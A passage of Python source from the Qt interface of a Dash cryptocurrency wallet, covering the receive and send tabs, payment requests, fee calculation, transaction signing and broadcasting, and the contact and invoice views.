grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.setObjectName("receive_container")
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} duffs are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Dash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_kb())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Dash-Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 duffs might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(30)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
w.setObjectName("send_container")
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee * 1000 / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee * 1000 / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/kB feerate
amount = 0 if amount is None else amount # sat/kB feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Dash Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Dash Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast_transaction(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid Dash URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_kb())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
l.setObjectName("utxo_container")
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
l.setObjectName("contacts_container")
return self.create_list_tab(l)
def create_proposals_tab(self):
from masternode_budget_widgets import ProposalsTab
self.proposals_list = ProposalsTab(self)
return self.proposals_list
def update_proposals_tab(self):
# Disabled until API is stable.
return
if not self.masternode_manager:
return
self.proposals_list.update(list(self.network.all_proposals))
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
